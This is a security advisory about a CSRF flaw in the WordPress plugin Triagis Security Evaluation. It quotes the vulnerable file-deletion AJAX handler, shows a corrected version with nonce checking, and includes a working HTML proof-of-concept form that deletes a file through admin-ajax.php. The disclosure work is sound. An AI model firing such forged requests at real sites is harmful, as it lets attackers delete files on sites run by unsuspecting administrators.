Far too often, security plugins for WordPress turn out to introduce security vulnerabilities of their own. If you know much about security that isn't too surprising, since so many security companies don't seem to know or care much about security.
We recently ran across the security plugin Triagis® Security Evaluation, which is described as “a simple lite-weight plugin to analyze your current WordPress installation, server for security vulnerabilities”. While taking a look over the plugin we found that it made functions available through WordPress’ AJAX functionality that are restricted to Administrator level users, but lack protection against cross-site request forgery (CSRF). Through that an attacker could cause a logged-in Administrator to change the WordPress content directory’s location, change the website’s file permissions, delete arbitrary files on the website, change a user’s username, change the database prefix, or move the WordPress configuration file. While CSRF vulnerabilities are not something likely to be targeted at this time, an attacker who did succeed in exploiting this could cause some serious issues.
As an example of the issues let’s take a look at the function w4sl_delete_file_ajax() (in the file /admin/page-security-informations.php), which handles deleting files.
The function checks if the user making the request is an Administrator:
if( !is_super_admin()) die( json_encode( array( 'error' => 'Unauthorized access !!' )));
Then it checks whether the requested file exists and is readable:
$file = w4sl_sanitize_path( $_POST['file'] );
if( empty( $file ) || !file_exists( $file ))
    die( json_encode( array( 'error' => 'File not found !!' )));
if( !is_readable( $file ))
    die( json_encode( array( 'error' => 'File not readable !!' )));
After that it deletes the file:
@unlink( $file );
Nowhere in the function is there a check for a valid nonce, which is what WordPress uses to prevent CSRF.
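For comparison, this is what the same handler looks like with the missing nonce check in place. It is an added example written for this post, not code from the plugin: the nonce action string 'w4sl_delete_file', the w4sl_example_ function names and the allowed directory are assumptions, while the AJAX action name and the is_super_admin() check come from the plugin itself.

```php
<?php
// Added example, not the plugin's code. Shows the two halves of WordPress
// CSRF protection: issuing a nonce to the legitimate admin page, and
// verifying it in the AJAX handler before the capability check runs.

// 1. When the plugin's admin page loads, hand the nonce to its JavaScript
//    (a form could use wp_nonce_field() instead). Script handle and file
//    name are assumptions for the example.
function w4sl_example_enqueue_admin_script() {
    wp_enqueue_script( 'w4sl-example', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'w4sl-example', 'w4slExample', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'w4sl_delete_file' ), // action string assumed
    ) );
}
add_action( 'admin_enqueue_scripts', 'w4sl_example_enqueue_admin_script' );

// 2. The handler. check_ajax_referer() dies with HTTP 403 unless the
//    'nonce' POST field holds a nonce tied to the logged-in user and the
//    'w4sl_delete_file' action. A third-party page cannot read that value,
//    so a forged POST like the proof of concept below never reaches unlink().
function w4sl_example_delete_file_ajax() {
    check_ajax_referer( 'w4sl_delete_file', 'nonce' );

    if ( ! is_super_admin() ) {
        wp_send_json_error( array( 'error' => 'Unauthorized access' ), 403 );
    }

    // Confine deletions to one directory (assumed policy) and resolve
    // "../" with realpath() so a relative path cannot escape it.
    $base = realpath( WP_CONTENT_DIR . '/w4sl-example-files' );
    $file = realpath( wp_unslash( $_POST['file'] ?? '' ) );
    if ( false === $base || false === $file
        || 0 !== strpos( $file, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( array( 'error' => 'File not found' ), 404 );
    }
    if ( ! is_writable( $file ) ) {
        wp_send_json_error( array( 'error' => 'File not writable' ), 403 );
    }

    unlink( $file );
    wp_send_json_success( array( 'deleted' => basename( $file ) ) );
}
add_action( 'wp_ajax_w4sl_delete_file', 'w4sl_example_delete_file_ajax' );
```

The order matters: the nonce check runs first, so a request that does not carry a fresh nonce is rejected before any file-system work happens, regardless of who is logged in.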
Proof of Concept
The following proof of concept will delete a file named test.txt in the root directory of the WordPress install.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="w4sl_delete_file" />
<input type="hidden" name="file" value="../test.txt" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
- April 10, 2017 – Developer notified.
- April 19, 2017 – WordPress.org Plugin Directory notified.
- April 19, 2017 – Removed from WordPress.org Plugin Directory.